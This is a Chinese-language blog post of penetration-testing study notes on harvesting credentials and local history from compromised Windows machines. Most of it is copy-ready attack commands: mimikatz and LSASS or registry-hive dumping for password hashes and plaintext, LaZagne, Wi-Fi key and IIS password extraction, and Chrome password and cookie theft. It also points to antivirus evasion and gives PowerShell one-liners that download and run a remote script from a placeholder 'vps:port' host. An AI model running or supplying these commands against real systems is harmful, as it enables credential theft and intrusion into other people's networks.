密码凭证&本地历史の信息收集|内网渗透学习(四)

密码凭证&本地历史の信息收集|内网渗透学习(四)

前面部分还是哈希抓取的内容, 但是之前都是在msf中使用meterpreter的模块进行哈希获取, 这里是直接使用项目工具进行哈希抓取, 还是有所区别的

密码凭证收集

操作系统密码哈希加密使用方法变化过程

image-20220928152057449

mimikatz(获取当前登录用户的哈希和密码)

mimikatz默认直接启动的话是一个交互式的界面, 但是有时候我们获取的webshell并不能使用交互式的程序, 这时候就可以通过下面的方式执行mimikatz,直接将要逐个执行的全部命令作为单个字符串输入即可

mimikatz.exe "log res.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"

mimikatz.exe "log res.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"

log res.txt启动日志记录到res.txt中

privilege::debug开启debug模式提权

token::elevate获取到用户的token从而获取对应用户的权限

lsadump::sam会输出哈希值,这里lsadump::sam会获取输出sam文件中的哈希值

sekurlsa::logonpasswords会输出当前获取的用户哈希对应的用户信息和明文面, 明文获取失败的话就是显示null

在低版本1.x的mimikatz中还可以使用下面命令:

privilege::debug

inject::process lsass.exe sekurlsa.dllsekurlsa注入到lsass.exe进程里, 系统开启后就会运行lsass并且将哈希值都记录到里面

@getLogonPasswords获取密码

mimikatz免杀学习: https://www.freebuf.com/articles/system/234365.html

image-20220928154711813

IEX会将后面的内容载入内存中执行

powershell.exe IEX (New-Object-Net WebClient).DownloadString("url"); Invoke-Mimikatz-DumpCreds

wce

这个工具已经没有在维护了, 所以在新版本的windows中是运行不起来的, 但是在老版本的windows中还是很好用的, 功能比较简单粗暴

wce.exe -l
wce.exe -w

主要了解两个参数:

-l 列出当前在线用户和哈希值

-w 输出明文密码

pwddump7

pwddump7.exe > res.txt

使用这个工具可以直接输出获得全部的哈希值, 可以通过重定向导入一个文件中

https://www.objectif-securite.ch/ophcrack t

ophcrack

工具下载:https://ophcrack.sourceforge.io/

彩虹表下载

https://ophcrack.sourceforge.io/tables.php
http://project-rainbowcrack.com/table.htm

procdump+mimikatz

procdump工具下载:https//docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

procdump是windows微软的呆签名的工具, 但是现在很多杀软都对这个引用查杀的比较严格了, 这里建议可以用SharpDump这个C#编写的工具(这个工具相比procdump没那么容易被查杀)

SharpDump使用方式:

下载工具后切换到工具所在目录

ShrapDump.exe

直接执行不需要任何参数, 执行之后得到一个.bin文件, 将这个.bin文件修改后缀名为.gz, 任何通过gzip的方式解压, 解压之后拿到一个文件, we年中的就是哈希值

image-20220928164013672

取出哈希值文件, 任何执行mimikatz的命令:

mimikatz.exe "sekurlsa::mimidump debug.out" "sekurlsa::logonPasswords full"

Processdump lsass进程导出:

32位操作系统: processdump.exe -accepteula -ma lsass.exe lsass.dmp
64位操作系统: processdump.exe -ma lsass.exe lsass,dmp

然后使用mimikatz还原密码:

sekursa::mimidump lsass.dmp
sekursa::logonPasswords full

注册表导出

reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save HKLM\SECURITY security security.hiv

导出注册表后可以通过下面两个方式中的任意一个拿到哈希值

mimikatz.exe "lsadump::sam /system.hiv /sam:sam.hiv"  exit

python secretsdump.py -sam -sam.hiv -security security.hiv -system system.hiv LOCAL

LaZagne(推荐使用)

https://github.com/AlessandroZ/LaZagne

项目是python脚本,但是也有编译好的exe可以直接用, 可以获取多种方式获取系统中的多种密码, 这个工具算是比较齐全综合性比较强的了

本地历史信息收集

IE浏览器代理信息查看

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Setting"

wifi密码获取

netsh wlan show profile name="wifiName" key=clear

Windows host config

type C:\Windows\System32\drivers\etc\hosts

Windows IIS config

IIS6: 
cscript.exe C:\Inetpub\AdminScripts\adsuitil
.vbs ENUM W3SVC/1/root

IIS7/8:
列出网站列表: %systemroot%/system32/inetsrv/appcmd.exe list site
列出网站物理路径: %systemroot%\system32\inetsrv\appcmd.cxe list vdir

Mimikatz读取IIS7配置文件密码:
mimikatz.exe privilege::debug log "iis::apphost/in"%systemroot%\system32\inetsrv\config\applicationHost config" /live" exit

Windows回收站信息获取

回收站的目录地址为C:\$Recycle.Bin, 任何针对每个不同的用户都有一个单独的目录存放回收站中的删除文件

FOR /f "skip=1 tokens=1,2 delims= " %c in ('wmic useraccount get name^,sid')do dir /a/b

获取chrom密码和cookie

%localappdata%\google\chrom\USERDA~1\dedault\LOGIND~1
%localappdata%\google\chrom\USERDA~1\dedault\cookies

chrom用户信息保存在本地为sqlite数据库格式

mimikatz.exe privilege::debug log "dpapi::chrom/in:%localappdata%\google\chrom\USERDA~1\default\cookies /unprotect" exit

mimikatz.exe privilege::debug log "dpapi::chrom/in:%localappdata%\google\chrom\USERDA~1\default\LOGIND~1" exit

powershell加载远程脚本

powershell.exe IEX(new-object net.webclient).downloadstring('http://vps:port/GEt-Information.ps1');Get-Information
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇